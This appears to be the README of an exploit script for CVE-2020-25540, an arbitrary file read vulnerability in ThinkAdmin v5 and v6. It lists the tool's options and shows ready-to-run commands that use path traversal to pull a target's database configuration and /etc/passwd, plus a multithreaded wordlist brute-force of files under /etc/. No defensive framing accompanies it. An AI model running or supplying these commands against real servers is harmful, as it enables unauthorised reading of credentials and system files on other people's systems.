
ThinkAdmin v5 v6 任意文件读取漏洞利用,可自定义字典爆破
This script is used to exploit arbitrary file read vulnerabilities in ThinkAdmin v5 and v6 versions
==Note that the interface path may vary across different versions (some are based on the original ThinkAdmin with secondary development)==
Basic Usage
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
[-p PARALLEL]
Read files via API and get response
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target IP address or domain name
-f FILE, --file FILE File path to read
-w WORDLIST, --wordlist WORDLIST
Dictionary file path, providing multiple file paths or filenames
-b BASE_PATH, --base-path BASE_PATH
Base path, used to prepend paths from the dictionary file
-p PARALLEL, --parallel PARALLEL
Number of parallel threads
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10